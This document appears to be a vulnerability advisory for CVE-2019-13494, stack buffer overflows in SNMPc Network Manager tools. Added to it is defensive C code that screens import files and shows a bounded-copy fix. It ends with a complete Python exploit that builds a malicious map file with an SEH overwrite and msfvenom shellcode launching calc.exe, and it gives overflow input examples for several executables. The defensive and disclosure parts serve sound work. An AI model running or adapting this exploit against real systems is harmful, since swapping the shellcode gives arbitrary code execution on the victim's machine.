aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa","Device","127.0.0.1","1.3.6.1.4.1.29671.2.107","","3","000=Unknown","000=Unknown","auto.ico","","2","Square","Root Subnet(2)","(-16,-64)","N/A","True","auto.exe","00 00 00 00 00 00","127.0.0.1","30","2","2","","0","=","","Normal-Green","public","netman","public","SNMP V1","SNMP V1","","","",""
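A defender who wants to screen Map Objects text files before they reach nodeimp.exe can check field lengths ahead of the import. The C below is an added example written for this page, not code from the advisory or from Castle Rock Computing; the 255-byte threshold, the sample file name and the abbreviated six-column sample rows are assumptions, and the 2064-byte Name field mirrors the junk length the advisory's proof of concept uses. It flags any row whose longest quoted field exceeds the threshold and treats a line too long for its read buffer as oversized outright.

```c
#include <stdio.h>
#include <string.h>

#define LINE_BUF 8192   /* read buffer; a line that overflows it is flagged */

/* Length of the longest double-quoted field on one line of the map text
 * file. The header line carries no quotes and therefore yields 0. */
size_t longest_quoted_field(const char *line)
{
    size_t longest = 0, cur = 0;
    int in_quotes = 0;

    for (const char *p = line; *p != '\0'; p++) {
        if (*p == '"') {
            if (in_quotes && cur > longest)
                longest = cur;
            in_quotes = !in_quotes;
            cur = 0;
        } else if (in_quotes) {
            cur++;
        }
    }
    return longest;
}

/* Number of lines in the file whose longest quoted field exceeds max_len.
 * A line too long for the read buffer is counted as oversized outright,
 * the conservative choice for a pre-import screen. Returns -1 on open
 * failure. */
int count_oversized_rows(const char *path, size_t max_len)
{
    char buf[LINE_BUF];
    int flagged = 0;
    FILE *fp = fopen(path, "r");

    if (fp == NULL)
        return -1;

    while (fgets(buf, sizeof buf, fp) != NULL) {
        size_t n = strlen(buf);
        int truncated = (n == sizeof buf - 1 && buf[n - 1] != '\n');

        if (truncated) {
            int c;
            flagged++;
            /* discard the remainder so it is not read as a fresh line */
            while ((c = fgetc(fp)) != EOF && c != '\n')
                ;
        } else if (longest_quoted_field(buf) > max_len) {
            flagged++;
        }
    }
    fclose(fp);
    return flagged;
}

/* Write a constructed sample in the Map Objects layout (assumed shape for
 * this example): the first six columns of the header shown in the advisory,
 * a normal "Root Subnet" row, and a device row whose Name field is name_len
 * bytes of 'a'. Returns 0 on success. */
int write_sample_map(const char *path, size_t name_len)
{
    FILE *fp = fopen(path, "w");
    if (fp == NULL)
        return -1;

    fputs("Name,Type,Address,ObjectID,Description,ID\n", fp);
    fputs("\"Root Subnet\",\"Subnet\",\"\",\"\",\"\",\"2\"\n", fp);
    fputc('"', fp);
    for (size_t i = 0; i < name_len; i++)
        fputc('a', fp);
    fputs("\",\"Device\",\"127.0.0.1\",\"1.3.6.1.4.1.29671.2.107\",\"\",\"3\"\n", fp);

    return fclose(fp);
}

int main(void)
{
    const char *path = "sample_map.txt";   /* constructed sample file */
    write_sample_map(path, 2064);          /* same length as the PoC's junk */
    printf("rows with a field over 255 bytes: %d\n",
           count_oversized_rows(path, 255));
    return 0;
}
```

The threshold is a screening heuristic rather than the real limit inside nodeimp.exe, which the advisory does not state; pick a value comfortably above the longest legitimate field in your own exports and route anything flagged to a human before it is imported.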
The following executables are vulnerable to the stack-based buffer overflow via the command line when supplying an overly large string to the address, user, or pass variable arguments:
grpadd.exe
grpnext.exe
mapattr.exe
mapfind.exe
mapnext.exe
rptadd.exe
rptattr.exe
rptnext.exe
snmpget.exe
snmpset.exe
snmptest.exe
Example:
C:\Program Files (x86)\SNMPc Network Manager>grpnext.exe -a aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
The polldump.exe executable is vulnerable to a stack-based buffer overflow via the command line when an overly long string is supplied as the poller argument.
Example:
C:\Program Files (x86)\SNMPc Network Manager>polldump aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
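The command-line tools listed above share one bug shape: an argument value is copied into a fixed-size stack buffer without a length check (CWE-121). The C below is an added example written for this page, not code from the advisory or from the SNMPc binaries; ADDR_MAX, the -a option handling and the function names are assumptions. It places the unbounded copy beside a bounded one that rejects oversized input, and wraps the bounded copy in a small -a option walk so the rejection path is exercised.

```c
#include <stdio.h>
#include <string.h>

#define ADDR_MAX 64   /* assumed size of the fixed stack buffer */

/* Vulnerable shape: the option value is copied into a fixed-size stack
 * buffer with no length check, so a value longer than ADDR_MAX - 1 bytes
 * runs past the buffer into whatever the compiler placed after it
 * (CWE-121). Kept here for contrast only; nothing below calls it. */
void copy_address_unbounded(const char *arg, char out[ADDR_MAX])
{
    strcpy(out, arg);
}

/* Hardened shape: measure no further than the buffer allows, refuse
 * anything that does not fit together with its terminating NUL, and never
 * leave the destination in an undefined state.
 * Returns 0 on success, -1 if the value is too long. */
int copy_address_bounded(const char *arg, char out[ADDR_MAX])
{
    size_t n = 0;

    while (n < ADDR_MAX && arg[n] != '\0')
        n++;
    if (n == ADDR_MAX) {        /* no NUL within the buffer's capacity */
        out[0] = '\0';
        return -1;
    }
    memcpy(out, arg, n + 1);    /* n + 1 <= ADDR_MAX, includes the NUL */
    return 0;
}

/* Minimal option walk in the style of "tool -a <address>" (assumed shape).
 * Returns the bounded-copy result (0 or -1), -2 if -a has no value,
 * -3 if -a is absent. */
int parse_address_option(int argc, char **argv, char out[ADDR_MAX])
{
    out[0] = '\0';
    for (int i = 1; i < argc; i++) {
        if (strcmp(argv[i], "-a") == 0) {
            if (i + 1 >= argc)
                return -2;
            return copy_address_bounded(argv[i + 1], out);
        }
    }
    return -3;
}

int main(int argc, char **argv)
{
    char addr[ADDR_MAX];
    int rc = parse_address_option(argc, argv, addr);

    if (rc == 0)
        printf("address accepted: %s\n", addr);
    else if (rc == -1)
        fprintf(stderr, "error: -a value exceeds %d bytes, rejected\n", ADDR_MAX - 1);
    else
        fprintf(stderr, "usage: %s -a <address>\n", argv[0]);
    return rc == 0 ? 0 : 1;
}
```

The important property of the bounded version is that the length check happens before any byte is written and the result is reported to the caller, so a tool can print a usage error instead of corrupting its own stack; that is the behaviour the vendor's patched binaries need to exhibit for every argument the advisory names.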
Proof of Concept:
The following proof-of-concept Python code creates the malicious Map Objects import file, which can then be imported into SNMPc to trigger the buffer overflow in the nodeimp.exe process and launch calc.exe as a POC payload.
#--------------------------------------------------------------------#
# Exploit: SNMPc Enterprise Edition (9 & 10) (Mapping File Name BOF) #
# Exploit Author: @xerubus | mogozobo.com                            #
# Vendor Homepage: https://www.castlerock.com/products/snmpc/        #
# CVE-ID: CVE-2019-13494                                             #
# Full write-up: https://www.mogozobo.com/?p=3534                    #
#--------------------------------------------------------------------#
# Python 2 (print statements, byte-string literals).

import sys, os

os.system('clear')

print("""\
      _ _
     ___
 (~ )( ~)
  / \_\ \/ /
 | D_ ]\ \/        -= SNMPc_Mapping_BOF by @xerubus =-
 | D _]/\ \        -= We all have something to hide =-
  \___/ / /\ \\
 (_ )( _)
                                            @Xerubus
""")

filename = "evilmap.csv"

junk = "A" * 2064
nseh = "\xeb\x07\x90\x90"  # short jmp to 0018f58d \xeb\x07\x90\x90
seh = "\x05\x3c\x0e\x10"   # 0x100e3c05 ; pop esi # pop edi # ret (C:\program files (x86)\snmpc network manager\CRDBAPI.dll)

# Pre-padding of mapping file. Note mandatory trailing character return.
pre_padding = (
    "Name,Type,Address,ObjectID,Description,ID,Group1,Group2,Icon,Bitmap,Bitmap Scale,Shape/Thickness,Parent,Coordinates,Linked Nodes,Show Label,API Exec,MAC,Polling Agent,Poll Interval,Poll Timeout,Poll Retries,Status Variable,Status Value,Status Expression,Services,Status,Get Community,Set Community,Trap Community,Read Access Mode,Read/Write Access Mode,V3 NoAuth User,V3 Auth User,V3 Auth Password,V3 Priv Password"
    "\"Root Subnet\",\"Subnet\",\"\",\"\",\"\",\"2\",\"000=Unknown\",\"\",\"auto.ico\",\"\",\"2\",\"Square\",\"(NULL)\",\"(0,0)\",\"N/A\",\"True\",\"auto.exe\",\"00 00 00 00 00 00\",\"127.0.0.1\",\"30\",\"2\",\"2\",\"\",\"0\",\"0\",\"\",\"Normal-Green\",\"public\",\"netman\",\"public\",\"SNMP V1\",\"SNMP V1\",\"\",\"\",\"\",\"\"\n"
    "\"")

# Post-padding of mapping file. Note mandatory trailing character return.
post_padding = (
    "\",\"Device\",\"127.0.0.1\",\"1.3.6.1.4.1.29671.2.107\",\"\",\"3\",\"000=Unknown\",\"000=Unknown\",\"auto.ico\",\"\",\"2\",\"Square\",\"Root Subnet(2)\",\"(-16,-64)\",\"N/A\",\"True\",\"auto.exe\",\"00 00 00 00 00 00\",\"127.0.0.1\",\"30\",\"2\",\"2\",\"\",\"0\",\"=\",\"\",\"Normal-Green\",\"public\",\"netman\",\"public\",\"SNMP V1\",\"SNMP V1\",\"\",\"\",\"\",\"\"\n")

# msfvenom --platform windows -p windows/exec cmd=calc.exe -b "\x00\x0a\x0d" -f c
shellcode = (
    "\xda\xcc\xd9\x74\x24\xf4\xba\xd9\xa1\x94\x48\x5f\x2b\xc9\xb1"
    "\x31\x31\x57\x18\x83\xc7\x04\x03\x57\xcd\x43\x61\xb4\x05\x01"
    "\x8a\x45\xd5\x66\x02\xa0\xe4\xa6\x70\xa0\x56\x17\xf2\xe4\x5a"
    "\xdc\x56\x1d\xe9\x90\x7e\x12\x5a\x1e\x59\x1d\x5b\x33\x99\x3c"
    "\xdf\x4e\xce\x9e\xde\x80\x03\xde\x27\xfc\xee\xb2\xf0\x8a\x5d"
    "\x23\x75\xc6\x5d\xc8\xc5\xc6\xe5\x2d\x9d\xe9\xc4\xe3\x96\xb3"
    "\xc6\x02\x7b\xc8\x4e\x1d\x98\xf5\x19\x96\x6a\x81\x9b\x7e\xa3"
    "\x6a\x37\xbf\x0c\x99\x49\x87\xaa\x42\x3c\xf1\xc9\xff\x47\xc6"
    "\xb0\xdb\xc2\xdd\x12\xaf\x75\x3a\xa3\x7c\xe3\xc9\xaf\xc9\x67"
    "\x95\xb3\xcc\xa4\xad\xcf\x45\x4b\x62\x46\x1d\x68\xa6\x03\xc5"
    "\x11\xff\xe9\xa8\x2e\x1f\x52\x14\x8b\x6b\x7e\x41\xa6\x31\x14"
    "\x94\x34\x4c\x5a\x96\x46\x4f\xca\xff\x77\xc4\x85\x78\x88\x0f"
    "\xe2\x77\xc2\x12\x42\x10\x8b\xc6\xd7\x7d\x2c\x3d\x1b\x78\xaf"
    "\xb4\xe3\x7f\xaf\xbc\xe6\xc4\x77\x2c\x9a\x55\x12\x52\x09\x55"
    "\x37\x31\xcc\xc5\xdb\x98\x6b\x6e\x79\xe5")

print "[+] Building payload.."
payload = "\x90" * 10 + shellcode

print "[+] Creating buffer.."
buffer = pre_padding + junk + nseh + seh + payload + "\x90" * 10 + post_padding

print "[+] Writing evil mapping file.."
textfile = open(filename, 'w')
textfile.write(buffer)
textfile.close()

print "[+] Done. Import evilmap.csv into SNMPc and A Wild Calc Appears!\n\n"